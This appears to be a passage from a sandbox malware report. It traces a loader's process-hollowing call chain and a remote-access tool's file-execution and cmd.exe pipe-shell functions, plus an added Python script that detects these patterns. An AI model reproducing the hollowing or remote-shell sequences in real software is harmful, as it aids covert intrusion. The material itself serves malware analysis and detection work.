                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                    • Opcode ID: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                                                                                    • Instruction ID: e32f906aed8f9eec0158db6476ee320fbf8a2950183a202bcc0affda712ceffd
                                                                                                                                                    • Opcode Fuzzy Hash: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                                                                                    • Instruction Fuzzy Hash: 9EA011A8200A028A8E0A322A080022E2022AEC0200BC8C8A802020A2008A3A8C00A838
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02DE1A03,?,02DE1FC1), ref: 02DE15E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: ec4158c0ffc41dee0fbc74e28a10d8fddf0007023620a9034d0e051db5f69dbd
                                                                                                                                                    • Instruction ID: 158539a6c8b6a0610c492cad2fd34b30f6e18b618a24309c824e8cf28ea688bc
                                                                                                                                                    • Opcode Fuzzy Hash: ec4158c0ffc41dee0fbc74e28a10d8fddf0007023620a9034d0e051db5f69dbd
                                                                                                                                                    • Instruction Fuzzy Hash: EEF049F4B813004FDB06DF7A9949B057AD2EB89348F90857DEB0ADB388E77188468B10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02DE1FC1), ref: 02DE16A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 3d8f33e3cec7714336801adf2b362a477462ba1af09d2959d702e1357c50c29c
                                                                                                                                                    • Instruction ID: a9bb128d5d7bd52763c8d721eae61ed9e90c1c67aed571e13e88beb5e65114a7
                                                                                                                                                    • Opcode Fuzzy Hash: 3d8f33e3cec7714336801adf2b362a477462ba1af09d2959d702e1357c50c29c
                                                                                                                                                    • Instruction Fuzzy Hash: 70F090B6B806D56FD710AE5AAC84B82BBE4FB41318F454139F90897380D770AC52CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DE1704
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                    • Opcode ID: 48c1a4558b65e657f96e5c96591caa55a891f01fd718c07ec2e6a348de971d02
                                                                                                                                                    • Instruction ID: dbcc6150c50ebc6f8ecf99de575adecc9218e2966d2e10d95d4d4f10bb54beaf
                                                                                                                                                    • Opcode Fuzzy Hash: 48c1a4558b65e657f96e5c96591caa55a891f01fd718c07ec2e6a348de971d02
                                                                                                                                                    • Instruction Fuzzy Hash: A6E08675300311AFDB107A7A5D45B126BD9EB45654F154475F54ADB381D270EC118B70
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E45398,02E45388,OpenSession,02E45360,02DF9A30,ScanString,02E45360), ref: 02DF8446
                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,02E453DC,ScanString,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,UacInitialize,02E45360), ref: 02DF87DF
                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B0,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360), ref: 02DF8A3C
                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B0,00000004,02E454B8), ref: 02DF8BB7
                                                                                                                                                      • Part of subcall function 02DF7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                      • Part of subcall function 02DF7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                      • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,ScanBuffer,02E45360), ref: 02DF920B
                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B4,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,00000000), ref: 02DF937E
                                                                                                                                                    • SetThreadContext.KERNEL32(00000000,02E453DC,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B4,00000004,02E454B8), ref: 02DF94F4
                                                                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02E453DC,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B4), ref: 02DF9501
                                                                                                                                                      • Part of subcall function 02DF7AC0: LoadLibraryW.KERNEL32(bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC,ScanString,02E45360,02DF9A30), ref: 02DF7AD2
                                                                                                                                                      • Part of subcall function 02DF7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DF7ADF
                                                                                                                                                      • Part of subcall function 02DF7AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize), ref: 02DF7AF6
                                                                                                                                                      • Part of subcall function 02DF7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC), ref: 02DF7B05
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                    • API String ID: 2533507481-2367850715
                                                                                                                                                    • Opcode ID: 2c13057359998f023b48a785564c569c0fdc02b7071b71e23f71242d3a13cbab
                                                                                                                                                    • Instruction ID: 20102072a3bc13995f445c38235a3767b59ddc00bf4af2c90e93840453d0bca8
                                                                                                                                                    • Opcode Fuzzy Hash: 2c13057359998f023b48a785564c569c0fdc02b7071b71e23f71242d3a13cbab
                                                                                                                                                    • Instruction Fuzzy Hash: 56E20934A502689BDF51FB60DC90FCEB3B6EF55700F5180A5E20AAB314DA30AE85CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
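The call list above is the textbook process-hollowing chain: a child is created with CREATE_SUSPENDED (dwCreationFlags = 00000004 in the CreateProcessAsUserW arguments), its thread context is read, the original image is unmapped with NtUnmapViewOfSection, new memory is allocated and written with NtAllocateVirtualMemory/NtWriteVirtualMemory, and the entry point is redirected with SetThreadContext before NtResumeThread. The following script is an added example, not Joe Sandbox code and not part of this report: it parses "APIs" listing lines in the format shown on this page (the format is inferred from these lines, the stage names are ours, and the argument positions come from the documented Win32 prototypes) and classifies a function as hollowing or, for contrast, as the anonymous-pipe command shell of the Remcos function further down (the CreatePipe/CreateProcessA/PeekNamedPipe entries at 156857B6 to 156859E4). The sample listings are copied from those two report entries. Caveat reflected in the code: the sandbox prints raw stack slots, so entries past a call's real parameter count are leftover stack values and only positional checks are meaningful.

```python
"""Classify a Joe Sandbox 'APIs' listing by the injection sequence it shows.

Added example, not Joe Sandbox code. The line format is inferred from the
listings on this page; argument positions come from the documented Win32
prototypes; stage names are ours."""
import re
from collections import namedtuple

Call = namedtuple("Call", "api canon module args ref subcall")

# One resolved call per line:  • Api.Module(arg0,arg1,...), ref: ADDRESS
# Calls made from inside a callee carry a "Part of subcall function X:" prefix.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>[^(\s]+)\s*"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

CREATE_SUSPENDED = 0x4
# The sandbox prints raw stack slots, so entries past the real parameter
# count are leftover values: index by position, never search by value.
_CREATE_FLAGS_IDX = {"CreateProcess": 5, "CreateProcessAsUser": 6,
                     "CreateProcessWithLogon": 6, "CreateProcessWithToken": 4}
_INHERIT_IDX = {"CreateProcess": 4, "CreateProcessAsUser": 5}

# Hollowing stages in the order a loader performs them; each set holds the
# Win32 and native spellings of the same step.
HOLLOW_STAGES = [
    ("create_suspended", {"CreateProcess", "CreateProcessAsUser",
                          "CreateProcessWithLogon", "CreateProcessWithToken"}),
    ("get_context", {"GetThreadContext", "Wow64GetThreadContext", "NtGetContextThread"}),
    ("read_remote", {"NtReadVirtualMemory", "ReadProcessMemory"}),
    ("unmap", {"NtUnmapViewOfSection"}),
    ("allocate", {"NtAllocateVirtualMemory", "VirtualAllocEx"}),
    ("write", {"NtWriteVirtualMemory", "WriteProcessMemory"}),
    ("set_context", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume", {"NtResumeThread", "ResumeThread"}),
]
_REQUIRED = ("create_suspended", "write", "set_context", "resume")


def canon_name(api):
    """Fold Zw*/Nt* and the A/W suffix so one stage set covers every spelling."""
    api = re.sub(r"^Zw", "Nt", api)
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


def _arg_int(token):
    """Stack slots print as hex dwords; '?' or a string literal yields None."""
    try:
        return int(token.strip(), 16)
    except ValueError:
        return None


def parse_calls(listing):
    calls = []
    for line in listing.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(Call(m.group("api"), canon_name(m.group("api")),
                          m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def _creation_flags(call):
    idx = _CREATE_FLAGS_IDX.get(call.canon)
    if idx is None or idx >= len(call.args):
        return None
    return _arg_int(call.args[idx])


def find_hollowing(calls):
    """Walk the stages in listing (call-site) order; a stage only counts if it
    appears after the stages already matched, so a stray write before the
    suspended create is not taken as injection into that child."""
    seen, cursor = {}, 0
    for stage, names in HOLLOW_STAGES:
        for i in range(cursor, len(calls)):
            c = calls[i]
            if c.canon not in names:
                continue
            if stage == "create_suspended":
                flags = _creation_flags(c)
                if flags is None or not flags & CREATE_SUSPENDED:
                    continue
            seen[stage] = c.ref
            cursor = i + 1
            break
    if all(s in seen for s in _REQUIRED):
        verdict = "process hollowing"
    elif "create_suspended" in seen:
        verdict = "suspended process created, injection chain incomplete"
    else:
        verdict = "no hollowing sequence"
    return {"stages": list(seen), "evidence": seen, "verdict": verdict}


def find_pipe_shell(calls):
    """Remcos-style shell: two anonymous pipes, a child created with
    bInheritHandles=1, PeekNamedPipe/ReadFile to relay its output and
    WriteFile to feed it commands."""
    pipes = sum(1 for c in calls if c.canon == "CreatePipe")
    inherits = any(c.canon in _INHERIT_IDX and len(c.args) > _INHERIT_IDX[c.canon]
                   and _arg_int(c.args[_INHERIT_IDX[c.canon]]) == 1 for c in calls)
    reads = any(c.canon in {"ReadFile", "PeekNamedPipe"} for c in calls)
    writes = any(c.canon == "WriteFile" for c in calls)
    return pipes >= 2 and inherits and reads and writes


def classify(listing):
    calls = parse_calls(listing)
    h = find_hollowing(calls)
    return {"calls": len(calls), "hollowing": h["verdict"],
            "stages": h["stages"], "pipe_shell": find_pipe_shell(calls)}


# Copied from this report's listing for the DBatLoader function at 02DF8446.
HOLLOWING_LISTING = r"""
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E45398,02E45388,OpenSession,02E45360,02DF9A30,ScanString,02E45360), ref: 02DF8446
• GetThreadContext.KERNEL32(00000000,02E453DC,ScanString,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,UacInitialize,02E45360), ref: 02DF87DF
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B0,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360), ref: 02DF8A3C
• NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B0,00000004,02E454B8), ref: 02DF8BB7
  • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,ScanBuffer,02E45360), ref: 02DF920B
• SetThreadContext.KERNEL32(00000000,02E453DC,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B4,00000004,02E454B8), ref: 02DF94F4
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02E453DC,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B4), ref: 02DF9501
"""

# Copied from this report's listing for the Remcos shell function at 1568583F.
SHELL_LISTING = r"""
• CreatePipe.KERNEL32(156F6CCC,156F6CB4,156F6BD8,00000000,156E60BC,00000000), ref: 156857B6
• CreatePipe.KERNEL32(156F6CB8,156F6CD4,156F6BD8,00000000), ref: 156857CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,156F6BE8,156F6CBC), ref: 1568583F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 156858BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 156858E9
• WriteFile.KERNEL32(00000000,00000000,?,00000000,156F4F90,156E60C0,00000062,156E60A4), ref: 156859E4
• CloseHandle.KERNEL32 ref: 15685A23
"""

if __name__ == "__main__":
    for name, text in (("DBatLoader 02DF8446", HOLLOWING_LISTING),
                       ("Remcos 1568583F", SHELL_LISTING)):
        print(name, classify(text))
```

Paste any other "APIs" block from the report into `classify` to triage it the same way; the ordering rule in `find_hollowing` is what keeps an unrelated NtWriteVirtualMemory earlier in a function from being counted as part of the chain.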

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E45398,02E45388,OpenSession,02E45360,02DF9A30,ScanString,02E45360), ref: 02DF8446
                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,02E453DC,ScanString,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,UacInitialize,02E45360), ref: 02DF87DF
                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B0,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360), ref: 02DF8A3C
                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B0,00000004,02E454B8), ref: 02DF8BB7
                                                                                                                                                      • Part of subcall function 02DF7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                      • Part of subcall function 02DF7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                      • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                    • API String ID: 3979268988-2367850715
                                                                                                                                                    • Opcode ID: 152666f876633a09bf1a46597a798f1e7acbe3f561550d4d02cb9c4f9d55bbb1
                                                                                                                                                    • Instruction ID: 46e2293c9351a108613cba2ff076f2439167651bd6027233d4a2809dcbd6b2c8
                                                                                                                                                    • Opcode Fuzzy Hash: 152666f876633a09bf1a46597a798f1e7acbe3f561550d4d02cb9c4f9d55bbb1
                                                                                                                                                    • Instruction Fuzzy Hash: D2E20934A502689BDF51FB60DC90FCEB3B6EF55700F5180A5E20AAB314DA70AE85CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 15687CB9
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 15687D87
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 15687DA9
                                                                                                                                                      • Part of subcall function 1569C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,156F4EE0,?), ref: 1569C2EC
                                                                                                                                                      • Part of subcall function 1569C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,156F4EE0,?), ref: 1569C31C
                                                                                                                                                      • Part of subcall function 1569C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,156F4EE0,?), ref: 1569C371
                                                                                                                                                      • Part of subcall function 1569C291: FindClose.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D2
                                                                                                                                                      • Part of subcall function 1569C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D9
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                      • Part of subcall function 15684AA1: WaitForSingleObject.KERNEL32(?,00000000,15681A45,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000), ref: 15684B47
                                                                                                                                                      • Part of subcall function 15684AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000,?,?,?,?,?,15681A45), ref: 15684B75
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15688197
                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 15688278
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 156884C4
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 15688652
                                                                                                                                                      • Part of subcall function 1568880C: __EH_prolog.LIBCMT ref: 15688811
                                                                                                                                                      • Part of subcall function 1568880C: FindFirstFileW.KERNEL32(00000000,?,156E6608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888CA
                                                                                                                                                      • Part of subcall function 1568880C: __CxxThrowException@8.LIBVCRUNTIME ref: 156888F2
                                                                                                                                                      • Part of subcall function 1568880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888FF
                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 156886F8
                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 1568873A
                                                                                                                                                      • Part of subcall function 1569C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 1569CAD7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                                                    • API String ID: 1067849700-1507758755
                                                                                                                                                    • Opcode ID: 9531dc844c9b06d822ad33d27ca17d0d32eb98f83fcf8066ae5325701287ac62
                                                                                                                                                    • Instruction ID: 1a5aa79ec72c1cf29d90f0d880d9439b42e5935283555afa1f7baa5fc0799e66
                                                                                                                                                    • Opcode Fuzzy Hash: 9531dc844c9b06d822ad33d27ca17d0d32eb98f83fcf8066ae5325701287ac62
                                                                                                                                                    • Instruction Fuzzy Hash: 4D427F79B0A304ABC618FB74CC659AE77A9AF91200F800D1CE543572D4EF75BA08C7DA
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 156856E6
  • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
• __Init_thread_footer.LIBCMT ref: 15685723
• CreatePipe.KERNEL32(156F6CCC,156F6CB4,156F6BD8,00000000,156E60BC,00000000), ref: 156857B6
• CreatePipe.KERNEL32(156F6CB8,156F6CD4,156F6BD8,00000000), ref: 156857CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,156F6BE8,156F6CBC), ref: 1568583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 15685897
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 156858BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 156858E9
  • Part of subcall function 156B4770: __onexit.LIBCMT ref: 156B4776
• WriteFile.KERNEL32(00000000,00000000,?,00000000,156F4F90,156E60C0,00000062,156E60A4), ref: 156859E4
• Sleep.KERNEL32(00000064,00000062,156E60A4), ref: 156859FE
• TerminateProcess.KERNEL32(00000000), ref: 15685A17
• CloseHandle.KERNEL32 ref: 15685A23
• CloseHandle.KERNEL32 ref: 15685A2B
• CloseHandle.KERNEL32 ref: 15685A3D
• CloseHandle.KERNEL32 ref: 15685A45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: SystemDrive$cmd.exe
• API String ID: 2994406822-3633465311
• Opcode ID: d07cdffecf2d83aac8b64e8c8fc9ca70a56ddea336d6073bc1b8c9c33a9c4037
• Instruction ID: 45aaa79962702e7a92fa54b5bf27f04a9608b5ff8f286db8dbb646b2e261c639
• Opcode Fuzzy Hash: d07cdffecf2d83aac8b64e8c8fc9ca70a56ddea336d6073bc1b8c9c33a9c4037
